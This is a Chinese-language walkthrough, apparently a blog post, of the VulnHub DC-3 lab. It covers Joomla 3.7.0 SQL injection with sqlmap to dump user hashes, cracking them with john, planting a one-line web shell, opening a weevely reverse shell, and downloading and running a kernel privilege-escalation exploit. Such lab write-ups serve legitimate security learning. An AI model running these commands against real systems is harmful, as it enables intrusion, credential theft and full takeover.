下载地址
https://www.vulnhub.com/entry/dc-3,312/
实战步骤
首先我们打开靶机
用nmap探测主机
应该是152,探测一下端口
只开了个80,访问看看
是一个joomla的cms,我们需要确定cms的版本,然后看看有没有能利用的漏洞。我们用如下命令:
joomscan --url http://192.168.220.136
确定版本,joomla3.7.0,用searchsploit工具查找Joomla 3.7.0 版本存在的漏洞
searchsploit Joomla 3.7.0
发现一个SQL注入的漏洞
将sql注入漏洞相关介绍文档保存到本地,并查看相关注入方法
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt sql.txt
cat sql.txt
使用注入方法:
看一下我们现在用的joomladb
sqlmap -u "http://192.168.207.152/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
再看一下users那个表
sqlmap -u "http://192.168.207.152/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
值得注意的是name和password
sqlmap -u "http://192.168.207.152/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]
得到用户名和加密的密码。将密文保存在一个文件中
vim 111
使用john爆破hash值
得到密码snoopy
我们需要进入后台,查找得知administrator是joomla默认的后台地址,我们尝试访问
进来了,哈哈,用刚才获取的账户密码登陆
进入后台,翻一翻有没有能上传文件的地方
这里有个New File,尝试搞个一句话
用蚁剑连接
成功连上
接下来用weevely反弹个shell出来
把shell.php上传到主机上
用kali连接
拿到shell,可很明显我们要的东西应该在root文件夹下,要进行提权处理,搜索本机信息
查看内核版本
ubantu 16.04,去看看有什么提取方法。使用searchsploit
这个可以用来提权,尝试使用
去下载,解压之后上传到目标主机(需要*)
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
最后的文件,上传过去
进入到tmp文件夹依次执行
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
等待一会,提权成功,游戏结束
总结
看一下整体思路:
1、确定cms版本
2、针对版本找目录
3、找上传点,上传一句话,蚁剑连接
4、用weevely反弹个shell出来
5、确定内核版本,找对应漏洞
6、提权,over